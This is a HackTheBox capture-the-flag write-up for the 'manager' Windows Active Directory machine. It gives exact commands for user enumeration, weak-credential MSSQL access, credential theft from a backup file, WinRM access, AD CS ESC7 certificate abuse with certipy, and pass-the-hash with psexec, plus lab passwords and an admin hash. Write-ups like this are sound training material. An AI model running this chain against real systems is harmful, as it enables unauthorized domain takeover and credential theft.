HTB: manager Writeup
Machine Information
| Attribute | Details | |
|---|---|---|
| Name | manager | |
| OS | Windows | |
| Difficulty | Medium | |
| Points | N/A | |
| Release Date | N/A | |
| IP Address | 10.129.142.52 | |
| Author | D3vnomi | |
Machine Rating
⭐⭐⭐⭐☆ (7.0/10)
Difficulty Assessment:
- Enumeration: ⭐⭐⭐☆☆
- Real-world: ⭐⭐⭐⭐☆
- CVE: ⭐⭐☆☆☆
- CTF-like: ⭐⭐⭐☆☆
Summary
manager is a Medium-difficulty Windows Active Directory machine. The exploitation path involves Kerberos user enumeration, gaining MSSQL database access with weak credentials, discovering backup files containing LDAP credentials, lateral movement via WinRM, and finally privilege escalation through AD CS (Active Directory Certificate Services) ESC7 exploitation.
TL;DR: Kerbrute enumeration → MSSQL access → Backup file discovery → LDAP credentials → WinRM access → AD CS ESC7 exploitation → Administrator.
Reconnaissance
Initial Setup
Domain: manager.htb
Domain Controller: dc01.manager.htb
Technologies: MSSQL, IIS, LDAP, AD CS (Certificate Services)
echo "10.129.142.52 manager.htb dc01.manager.htb" >> /etc/hostsUser Enumeration
Using kerbrute to enumerate valid Active Directory users:
kerbrute userenum -d manager.htb --dc dc01.manager.htb wordlist.txtDiscovered Users:
- ryan
- guest
- cheng
- raven
- administrator
- operator
- jinwoo
Initial Foothold
MSSQL Access
The user operator has a weak password that matches the username. Connected to MSSQL database:
impacket-mssqlclient -p 1433 -windows-auth -dc-ip 10.129.142.52 "manager.htb/Operator:Operator"@10.129.142.52Once authenticated, enumerated the IIS web directory:
EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;Result: Discovered website-backup-27-07-23-old.zip file in the web root.
User Compromise
Backup File Analysis
Downloaded the backup file from the web server:
wget http://manager.htb/website-backup-27-07-23-old.zipunzip website-backup-27-07-23-old.zipAnalyzed configuration files and discovered .old-conf.xml containing LDAP credentials:
user: raven@manager.htbpassword: R4v3nBe5tD3veloP3r!123server: dc01.manager.htbport: 389WinRM Access
Used the discovered credentials to gain shell access:
evil-winrm -i 10.129.142.52 -u raven -p 'R4v3nBe5tD3veloP3r!123'Successfully authenticated as raven on the domain.
User Flag
cat C:\Users\raven\Desktop\user.txt🚩 User Flag: <REDACTED>
Privilege Escalation
AD CS ESC7 Exploitation
The Certificate Authority (manager-DC01-CA) has misconfigured permissions allowing privilege escalation through certificate abuse.
Step 1: Add raven as CA Officer
certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.142.52Step 2: Enable SubCA Template
certipy ca -ca 'manager-DC01-CA' -enable-template 'SubCA' -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.142.52Step 3: Request Certificate as Administrator
certipy req -ca 'manager-DC01-CA' -target 10.129.142.52 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -template SubCA -upn administrator@manager.htbStep 4: Issue the Certificate Request
certipy ca -ca 'manager-DC01-CA' -issue-request 19 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.142.52Step 5: Retrieve the Issued Certificate
certipy req -ca 'manager-DC01-CA' -target 10.129.142.52 -retrieve 19 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'This generates administrator.pfx.
Step 6: Authenticate with Administrator Certificate
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'manager.htb' -dc-ip 10.129.142.52Result: Obtained administrator NTLM hash:
aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924efStep 7: PSExec as Administrator
python3 psexec.py manager.htb/administrator@10.129.142.52 -hashes aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924efSuccessfully gained SYSTEM-level access.
Root Flag
type C:\Users\Administrator\Desktop\root.txt🚩 Root Flag: <REDACTED>
Attack Chain Summary
graph TD A["Kerbrute User Enumeration"] --> B["MSSQL Access (operator:operator)"] B --> C["Directory Listing via xp_dirtree"] C --> D["Discover website-backup-27-07-23-old.zip"] D --> E["Extract LDAP Credentials (raven)"] E --> F["WinRM Access as raven"] F --> G["Add raven as CA Officer"] G --> H["Enable SubCA Template"] H --> I["Request Admin Certificate"] I --> J["Issue Certificate"] J --> K["Retrieve Administrator PFX"] K --> L["Authenticate with Certificate"] L --> M["Obtain Admin Hash"] M --> N["PSExec - SYSTEM Access"]Tools Used
| Tool | Purpose |
|---|---|
kerbrute | Kerberos user enumeration |
impacket-mssqlclient | MSSQL database client and interaction |
evil-winrm | Windows Remote Management (WinRM) shell access |
wget | File downloads from web server |
certipy | Active Directory Certificate Services (AD CS) exploitation |
psexec.py | Windows process execution via SMB |
python3 | Scripting and exploit execution |
unzip | Archive extraction |
Key Learnings
- Weak default credentials (username = password) on database services are a critical entry point.
- Backup and configuration files often contain sensitive data like plaintext passwords for directory services.
- MSSQL
xp_dirtreestored procedure can be leveraged to enumerate file system paths from the database. - Active Directory Certificate Services (AD CS) misconfigurations can be exploited for privilege escalation (ESC7).
- Certificate-based authentication can be more effective than password-based attacks when the CA is misconfigured.
- Thorough enumeration across all services is essential — MSSQL access led to web backup discovery, which led to domain credentials.
Author
D3vnomi
Disclaimer
This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.
Last Updated: 08 Mar 2026
Tags: #HackTheBox #Windows #Medium